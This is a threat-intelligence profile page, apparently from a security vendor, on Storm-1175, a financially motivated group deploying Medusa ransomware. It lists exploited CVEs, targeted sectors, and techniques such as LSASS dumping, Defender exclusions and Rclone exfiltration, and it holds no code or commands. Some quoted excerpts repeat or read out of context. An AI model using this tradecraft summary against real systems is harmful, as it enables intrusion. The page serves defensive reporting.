Storm-1175
Storm-1175 is a Microsoft-tracked, financially motivated cybercrime threat actor associated with Medusa ransomware. Multiple sources in the provided content describe the actor as China-based or a Chinese financially motivated threat operation. The group conducts high-velocity ransomware campaigns against vulnerable internet-facing systems, often moving from initial exploitation to data exfiltration and Medusa deployment within a few days and in some cases within 24 hours. Storm-1175 primarily exploits newly disclosed N-day vulnerabilities during the gap between disclosure and patch adoption, but the content also states it has used zero-day vulnerabilities, including exploitation of CVE-2025-10035 in Fortra GoAnywhere MFT and CVE-2026-23760 in SmarterMail before public disclosure. Across the provided reporting, Microsoft linked Storm-1175 to exploitation of more than 16 vulnerabilities since 2023, including CVE-2023-21529 in Microsoft Exchange, CVE-2023-27350 and CVE-2023-27351 in PaperCut, CVE-2023-46805 and CVE-2024-21887 in Ivanti Connect Secure and Policy Secure, CVE-2024-1708 and CVE-2024-1709 in ConnectWise ScreenConnect, CVE-2024-27198 and CVE-2024-27199 in JetBrains TeamCity, CVE-2024-57726 through CVE-2024-57728 in SimpleHelp, CVE-2025-31161 in CrushFTP, CVE-2025-10035 in GoAnywhere MFT, CVE-2025-52691 and CVE-2026-23760 in SmarterMail, CVE-2025-31324 in SAP NetWeaver, and CVE-2026-1731 in BeyondTrust. The actor targets organizations in the United States, the United Kingdom, and Australia. Sectors explicitly mentioned in the content include healthcare, education, finance, professional services, law firms, hospitals, schools, and services. Recent reporting says healthcare organizations were heavily impacted. Observed tradecraft includes exploitation of public-facing applications for initial access; use of web shells or remote access payloads for persistence; creation of new user or administrator accounts; lateral movement with PowerShell, PsExec, RDP, mstsc.exe, Cloudflare tunnels, and remote monitoring and management tools; credential theft using Impacket and Mimikatz; LSASS dumping; WDigest changes; access to NTDS.dit and SAM; use of PDQ Deployer and Group Policy for broad ransomware deployment; and exfiltration with Rclone after staging data with Bandizip. The content also states Storm-1175 tampers with Microsoft Defender Antivirus by modifying registry settings and adding the C:\ drive to antivirus exclusion paths, and has used Windows Firewall policy changes to enable RDP. RMM tools and related software named in the content include AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect, SimpleHelp, Level RMM, N-able, and DWAgent. The content also links Storm-1175 to Medusa affiliate activity and notes that techniques observed in Medusa affiliate operations tied to Storm-1175 were adopted by groups deploying Akira and Black Basta payloads. No additional aliases or sub-group names for Storm-1175 are provided in the content beyond the Microsoft tracking name Storm-1175.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Health Care Equipment & Services
- Financials
- Utilities
Tradecraft
35 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
12 malware families attributed to this actor across reporting.
7 additional families tracked in Mallory.
Associated vulnerabilities
21 CVEs this actor has used in observed campaigns. 21 of them exploited in the wild.
Additionally, Storm-1175 weaponized CVE-2025-10035, a maximum-severity flaw in GoAnywhere's Managed File Transfer's (MFT) License Servlet. Microsoft noted that both CVEs were exploited about a week before public disclosure.
the Microsoft Exchange Server deserialization of untrusted data bug, tracked as CVE-2023-21529, was included to the CISA list after being leveraged by Chinese financially motivated threat operation Storm-1175 to spread the Medusa ransomware.
In early 2026, they hit a service called SmarterMail (CVE-2026-23760) a full week before anyone knew a flaw existed.
Further investigation revealed that the group has exploited more than 16 different flaws since 2023, including software like Papercut (CVE-2023-27351) and JetBrains TeamCity (CVE-2024-27198).
Further investigation revealed that the group has exploited more than 16 different flaws since 2023, including software like Papercut (CVE-2023-27351) and JetBrains TeamCity (CVE-2024-27198).
16 more CVEs tied to this actor tracked in Mallory.
Observables
7 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A threat actor group behind Medusa ransomware activity, notable for rapid exploit-led intrusions and highly compressed attack lifecycles.
China-based threat actor linked to exploitation of ConnectWise ScreenConnect flaws in attacks deploying Medusa ransomware.
Activity cluster linked to Medusa affiliates observed using ESXi privilege abuse techniques in high-tempo ransomware operations.
Chinese financially motivated threat operation observed leveraging CVE-2023-21529 to spread Medusa ransomware.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.